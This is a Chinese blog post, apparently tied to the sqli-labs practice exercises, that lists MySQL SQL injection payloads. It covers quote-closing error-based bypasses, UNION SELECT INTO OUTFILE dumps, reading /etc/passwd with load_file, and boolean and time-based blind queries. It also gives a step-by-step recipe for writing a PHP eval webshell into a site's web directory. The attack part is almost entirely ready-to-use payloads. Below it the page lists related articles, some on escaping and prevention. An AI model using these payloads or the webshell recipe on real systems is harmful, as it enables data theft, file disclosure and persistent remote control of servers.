mysql引号注入_MySql注入

最新推荐文章于 2022-10-20 20:28:32 发布
最新推荐文章于 2022-10-20 20:28:32 发布
阅读量241 收藏
点赞数
文章标签: mysql引号注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42500369/article/details/113455613
版权

基本的报错注入

1、单引号报错-GET-字符型

错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

猜测:select * from table where id='$id' limit 0,1;

绕过:id=1' --+   id=1' --%20    id=1' %23   id=1' or '1'='1    id=1' or 1=1 --+等等

2、GET-数字型

错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

猜测:select * from table where id=$id limit 0,1

绕过:id=1 --+   id=1 or 1=1    id=1 or 1=1 %23

3单引号变形-字符型

错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

猜测:select * from table where id=('$id') limit 0,1

绕过:id=1') --+等等

4、双引号-字符型

错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1\") LIMIT 0,1' at line 1

猜测:select * from table where id=("$id") limit 0,1

绕过:id=1") --+   id=1") or ("1")=("1     ") or 1=1 --+

5、双查询注入

请参考我的上一篇博客

outfile函数

1、基本注入

语句:id=1' union select 1,2,3,4,5 into outfile "网站目录/test.txt" --+

id=1' union select table_name,2,3,4,5 from information_schema.tables where table_schame=database() into outfile "网站目录/test.txt" --+

id=1' union select load_file("/etc/passwd"),2,3,4,5 into outfile "网站目录/test.txt" --+

访问test.txt文件

2、注入并into outfile导出shell  必须magic_quotes_gpc为off

use database;使用数据库

create table shell(name text);创建表

insert into shell values (<?php @eval($_POST[123])?>);写入一句话木马

select * into outfile "网站目录/shell.php" from shell;   导出木马

3、脱裤

盲注

1、基于bool型

原理:对值进行判断,正确为true;

语句:id=1' and  (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))<102 --+

请大家以此类推!不想因为这些语句妨碍了篇幅。

substr("str","length1","length2");

length1:起始位置  length2:截取字符串长度

2、基于时间型

原理:当我们输入的在数据库有时,则会延迟执行,否则立即执行;

语句:select if((select database())="security",sleep(5),null);

select if((select version()) like "5%",sleep(5),null);

POST注入:与get注入方式相同;不过我们在用户名和密码选择一个地方就好了!

吴 元
关注
mysql 过滤单引号 注入_被过滤了引号的SQL注入如何破?
weixin_39940182的博客
01-19 2538
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤了单引号的SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
mysql中单双引号的特殊使用以及mysql常见的转义字符(转)
wzf7065的博客
08-01 2919
mysql中单双引号的特殊使用以及mysql常见的转义字符   原文  http://www.adintellig.com/special-use-of-single-and-double-quotes-in-mysql/ http://www.tuicool.com/articles/3I3QzqF mysql中使用基本的DML类型的sql语句, “”和‘’ 是de...
mysql 注入 引号_Mysql注入总结(一)
weixin_30995363的博客
01-18 302
先来看看瞌睡龙的科普文章默认存在的数据库:mysql需要root权限读取information_schema在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:字符串类型查询时:数字类型查询时:登陆时:'假''真"假""真\假\\真AND 1真AND 0假AND true真AND false假...
mysql引号注入_SQL注入保护-单引号
weixin_33162568的博客
01-18 206
Ive been doing a bit of testing to protect my sites from SQL Injection. I see there are a couple of ways of doing so, Escaping my user inputs, adding slashes, or better yet using parameterized sql sta...
mysql 注入 引号_十三:SQL注入MYSQL注入
weixin_39599705的博客
01-27 126
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作,其中也会遇到很多的阻碍,相关防御手法也要明确,所谓知己知彼,百战不殆。作为安全开发工作者,攻防兼备。注入点权限是否为root,取决于连接数据库的文件。这也决定了高权限注入及低权限注入跨库查询及应用思路information_schema 表特性,记录库名,表名,列名对应表获取所有数据库名?i...
mysql引号注入_MySQL在不知道列名情况下的注入详解
weixin_34587698的博客
01-18 49
前言最近感觉脑子空空,全在为了刷洞去挖洞,还是回归技术的本身让自己舒服些。好了,下面话不多说了,来一起看看详细的介绍吧前提以下情况适用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到列名或者只能获取到无有效内容的列名情况【例如 id】② 当希望通过information_s...
mysql插入单引号等转义字符的方法
热门推荐
frankwangzy1103的专栏
02-09 1万+
<br />查了半天,还是这个方法最简单,而且关键是能用~MySQL是这样的: INSERT INTO tb_test(id,value) VALUES(1,"it's"); 以上SQL语句已在 MySQL5.1 下测试通过。
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
php mysql_real_escape_string、addslashes函数以及mysql绑定参数是PHP开发中常用的防止SQL注入攻击的三种主要方法。 mysql_real_escape_string函数是PHP中的一个函数,用于转义SQL语句中使用的字符串中的特殊字符...
mysql_escape_string()函数用法分析
12-18
通过调用 `mysql_escape_string()`,可以将单引号转义为 `\` + 单引号,如 `aaa\\'s bbb`,这样在插入到 SQL 查询时,系统会正确地将其识别为字符串的一部分,而不是语句结束的标志。 尽管 `mysql_escape_string()`...
PHP函数addslashes和mysql_real_escape_string的区别
10-26
mysql_real_escape_string()是专门为了防止SQL注入而设计的,因此,它提供了更加严格的转义机制。 由于addslashes()的上述限制,在PHP中已不再推荐使用。相反,推荐使用mysql_real_escape_string()函数,特别是在...
sql注入替换掉单引号能解决吗
mineminemine123的博客
02-28 2331
引号引发的sql注入问题 正常情况下: 拼接前 id为"kk" password为"1234" 拼接后的查询语句:select * from employees where id=‘kk’ and password=‘1234’; 如果将password改为"4567 'or ‘1’='1" 拼接后的查询语句:select * from employees where id=‘kk’ and p...
【SQL注入攻击】Single quotes(单引号注入
sm1918451478的博客
10-20 1421
【SQL注入攻击】GET-Error based-Single quotes-String(GET型基于错误的单引号字符型注入
sql注入——单引号注入(sqli-labs-less1)
pluto_23的博客
07-22 4686
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类型的注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
SQL注入引号报错注入
weixin_43765321的博客
03-02 2037
1. 基于联合查询双引号注入模式 1.1 联合查询注入的一般步骤: 1.2 判断注入、求闭合字符 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1 and 1 = 1 – +正确显示 id = 1 and 1 = 2 – +错误 则,极有可能存在数字型SQL注入 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1’ and 1 = 1 – +正确显示 id = 1‘ and 1 = 2 – +错误 则,极有可能存在单引号字符型SQL注入 SQL语句如下时:
自动完成-SQL注入引号
猿人奶爸的博客
11-21 2427
在做查询自动完成(Autocomplete)功能时,出现一个小bug。如下图所示:                          用微软拼音键入时,会有单引号将拼音间隔开(搜狗不会),当触发前端自动完成代码块时,会调用后台的查询语句,然而......下一秒报错: 这个错误很明显是sql语句语法错误引起的,我这里后端用的是字符串拼接方式生成sql语句,其中部分条件模糊查询语句如下: ...
当需要插入mysql的数据包含单双引号时处理方法
youcijibi的博客
10-12 1万+
当需要插入mysql的数据包含单双引号时处理方法
SQL注入系列之PHP+Mysql手动注入(二)----字符型
fendo
02-25 7106
一、什么是字符型注入以及原理 1)字符型注入简介 字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。 字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。 2)基本原理: 看看这条SQL语
mysql插入字符串带引号_如何向数据库插入带有单引号(')的字符串?
weixin_39609541的博客
01-21 5151
我们在编程当中,经常会遇到在操作数据库时,向表里插入带有单引号的字符串。如果不作处理程序会报错,下面看看我们是怎么的处理它的。用SQL语句往数据库某字段(字符型)中插入字符串,但是当该字符串中带有单引号(')时就会出错!因为插入的字符串被从单引号处截断,造成SQL语句的语法错误!解决方法:遍历字符串,把一个(')换成两个(' ')就可以了,在C#里,其实用str.Replace("'", "''"...
奇淫技巧:不使用单引号和逗号进行SQL注入bypass
Coisini的博客
06-17 1807
0X00 背景 审计cms发现一个这样的环境: $l_id = get('arr','l_id'); $ids = explode(',',$l_id); 拼接post中数组的请求,然后再用逗号分隔,最后带入了SQL查询。 于是就遇到了不能使用逗号的情况。 默认 display_error=off 无显错,只能盲注。 0X01解决方案: 主要解决substring的逗号问题。 参考文档: ht...
MySQL SQL注入攻击详解与防范
"这篇资料主要介绍了基于MySQL的SQL注入攻击,包括其原理、危害和如何进行防范。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码来获取或篡改数据库中的敏感信息。" 在Web开发中,SQL注入攻击是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值